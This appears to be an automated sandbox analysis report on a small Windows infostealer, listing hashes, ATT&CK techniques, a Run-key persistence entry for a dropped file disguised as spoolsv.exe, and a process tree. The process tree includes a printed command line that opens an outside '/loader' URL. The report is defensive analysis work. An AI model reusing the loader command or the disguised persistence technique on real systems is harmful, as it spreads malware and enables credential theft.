605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a

Analysis

max time kernel
145s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
10/10/2023, 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe
Size

12KB
MD5

187e8635f8f2e07308d965cd421d54af
SHA1

5ab66a40adcb46f34dcf40ddc8aa20e19fcaab32
SHA256

605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a
SHA512

fcba3736ae134a04665570c5d85a713eaefc9d9deb573b505f07890fc19f4d77183041490be5fdbca5af9735bbc34b4ce6ab2dff25326f6d48176d9c5e106c67
SSDEEP

192:FmS1Xdn5wLpYXQEuS7wyEPQO0llY3Dvz0EoNH6TnF5E:JvnuVYgvYOr3boEiH0K

Score

7^/10

persistence spyware stealer

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
3060	spoolsv.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\spoolsv = "C:\\Windows\\spoolsv.exe"	605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\spoolsv = "C:\\Windows\\spoolsv.exe"	spoolsv.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\spoolsv.exe	605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe
File created	C:\Windows\spoolsv.exe	spoolsv.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1356	msedge.exe
1356	msedge.exe
2240	msedge.exe
2240	msedge.exe
4136	identity_helper.exe
4136	identity_helper.exe
4808	msedge.exe
4808	msedge.exe
4808	msedge.exe
4808	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2844	605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe
Token: SeDebugPrivilege	3060	spoolsv.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe
2240	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2844 wrote to memory of 3060	2844	605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe	85
PID 2844 wrote to memory of 3060	2844	605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe	85
PID 2844 wrote to memory of 3060	2844	605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe	85
PID 3060 wrote to memory of 2240	3060	spoolsv.exe	88
PID 3060 wrote to memory of 2240	3060	spoolsv.exe	88
PID 2240 wrote to memory of 3828	2240	msedge.exe	89
PID 2240 wrote to memory of 3828	2240	msedge.exe	89
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1108	2240	msedge.exe	92
PID 2240 wrote to memory of 1356	2240	msedge.exe	90
PID 2240 wrote to memory of 1356	2240	msedge.exe	90
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91
PID 2240 wrote to memory of 4848	2240	msedge.exe	91

C:\Users\Admin\AppData\Local\Temp\605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe
"C:\Users\Admin\AppData\Local\Temp\605e03fc3014cc84172e96b80cafae45f5f3c7775d2111f977d5f71e55da934a.exe"
1⤵
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844
- C:\Windows\spoolsv.exe
  "C:\Windows\spoolsv.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://onsapay.com/loader
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd795846f8,0x7ffd79584708,0x7ffd79584718
      4⤵
      PID:3828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
      4⤵
      PID:4848
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
      4⤵
      PID:1108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
      4⤵
      PID:1424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
      4⤵
      PID:1592
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
      4⤵
      PID:2472
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
      4⤵
      PID:4800
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
      4⤵
      PID:3964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3732 /prefetch:1
      4⤵
      PID:2164
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
      4⤵
      PID:1664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,14806484762376099737,10262628726168989660,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3312 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4808

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1676

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
db9dbef3f8b1f616429f605c1ebca2f0

SHA1
ffba76f0836c024828d4ff1982cc4240c41a8f16

SHA256
3e0297327872058355ac041a5e0fc83ed017faee0f6c0105b44bb3e5399a93a1

SHA512
4eedc387fe304f27f9d52ff5d71461c7f22147f7a8c18b8e7982acb76515528a36486a567451daafe093f9563b133c6799f2ad046e04256ccb46c83eb99e86c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b24c32f089fb1ce17093c6d3ec100763

SHA1
bf5027354a88a84f6209016af5be7f01a124eb50

SHA256
7d77adf4704f389801935c7a36dacb95f36c0ed1382b7b18bcc2ce016cae1a04

SHA512
b6d23cabcea9bb96a04ceb914b4b4c4f99375aa029a3ba0486d28be930e17911aff03c5ab1d31bb5431f903c1ace5c65de3ae634231d9fef711d86f713ef3b11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
7a3b6dc03cdcc34fcd7d5edaefd29950

SHA1
d92077fe65e5114345a413d84bfc9bc9c0219d4f

SHA256
fab40d240fe4403a012c21dddbc76348e53d1a91cd2427fb14fbf6ff66ea4c56

SHA512
b3d8437d8d3d5c3c30342acc42cefd22a7c12d50c9478be723b383bf014e132071fe59306b29159ea0828ceec657f8d60582dd5d6f2502ecf9610f4e17b30c06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
21bd124f2b1f2d90e8ea05ef4ff94d2d

SHA1
06b383d4227b562c698e744097938b7d40a39072

SHA256
12aa5cf46580ba5541a5e6c2c6ce0a8859ec5fb4177e5569b638269016f9eda0

SHA512
df73f0203cb98f0caaa917a955c7dc714e168c6ff1db07bc0d0de81450fcab2223ef51844db28370cbb1758c81cf9c81e4971db2d26f17941f1614206e41eb49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
cd1cbb0839c962ab802c60c3eba6c601

SHA1
214f3358e237202ac34be4ca15e96fcc4aa1e31d

SHA256
4b576dbd50fc4e383a36364dd3cd38bb40925e5ecc6dd295964d83518a8b9149

SHA512
a0c3737ab8901d5edf5c493edc9911afacc3797f385c99787ec364ee1a07c719dbb54b4a7b9b0fb17a947ff99a462fcd78e3bc8b05c85cb8ce4793c944a2b544

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
6dcb90ba1ba8e06c1d4f27ec78f6911a

SHA1
71e7834c7952aeb9f1aa6eb88e1959a1ae4985d9

SHA256
30d89e5026668c5a58bef231930a8bfb27ca099b24399a2615b210210d418416

SHA512
dc31807eaeb5221ac60d598035ca3ccab1dbeecc95caaff5e1f5a2a89ba1c83ef0a708ee0b8ed05b588ea5d50e360032a534356f84c89d3791df91d419daeff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8967e329e4287a7b2b87aeb46f4fac2c

SHA1
42c45098d76460486b16040e43b326d47d8ae782

SHA256
2fdd0b5ac264d925acd8c7757a4694401141daf4b69c0490cc7037b5a8e53581

SHA512
77d62b2fc94c77bd0d95e9bd8e512831288fa4ae4aed2819c901055d39c7b0aee4bf897e87bfffaaede3434e5b3a6bad148adab75ab97379c959c638439120a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
73de3c840fb2c26ad85531606fe551e4

SHA1
161d5a35c4aabfd68d28012d4fcc617edd3b386f

SHA256
3217e937b0c06dd1d5084537c859d3c0e768c6294656995690934bda8f061191

SHA512
c34a259832c082e361af2747db9393a357089f43fc7b108917c08837b8709359af35704efedf3e0e1ff7a333fd27aa9dbfd6f4e880582eef2f4f7643558f83a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

Filesize
334KB

MD5
9fc6423bcbf57b1cd5fe5f9abe80d0ef

SHA1
77c70b5d30c72f7907a220bc214a9ecbafa95020

SHA256
f66714299b21162fd1e98bdf98f8ab269d15c2310317d8e601a82a94b960f214

SHA512
83ca087e34fc06e63febe1c2bc31e5007db9f82b9b064388edc9473fb9d2903d0e2b2be20feb7335a655ae1173193c5d3544d8070130fda1c1cae8f11e086bca

Download Submit
C:\Users\Admin\AppData\Local\Temp\FRa9dyq0Zs3FWuk.exe

Filesize
12KB

MD5
b852b9f1c79c39769cd2627d290b2569

SHA1
547270ccdad258edef2704b782e115aef4666057

SHA256
c5fc5f3a063f3361bb75aaade426815b2bbbe3b46805b5be4a8678b77b80ab29

SHA512
dbde4dfc9b578c9250113cfe663b8396c69fd59eca65c4f90c28726e121467c50fe45ab08d6ba0b05055dc7a0a271eea71e233b157a3744ccfb287b2d78e16ba

Download Submit
C:\Windows\spoolsv.exe

Filesize
12KB

MD5
3d75b4de2c3edf60e7b79956d9afe7bb

SHA1
e200151ab4f14fca54117393486a11af2a1e2e0d

SHA256
e8b980ce74edd835672f209d6e78afa40d2ed9b1fef606e02b17e55095d4c5e0

SHA512
3fd6ee7b99a568feb634cb18df71a692ecf13b73a986388cf655d2e50f4a6e0a0bb890b46b84eaa39276799bbdcf50874a5769cb1a5a99fb72390f3caba23d27

Download Submit
C:\Windows\spoolsv.exe

Filesize
12KB

MD5
3d75b4de2c3edf60e7b79956d9afe7bb

SHA1
e200151ab4f14fca54117393486a11af2a1e2e0d

SHA256
e8b980ce74edd835672f209d6e78afa40d2ed9b1fef606e02b17e55095d4c5e0

SHA512
3fd6ee7b99a568feb634cb18df71a692ecf13b73a986388cf655d2e50f4a6e0a0bb890b46b84eaa39276799bbdcf50874a5769cb1a5a99fb72390f3caba23d27

Download Submit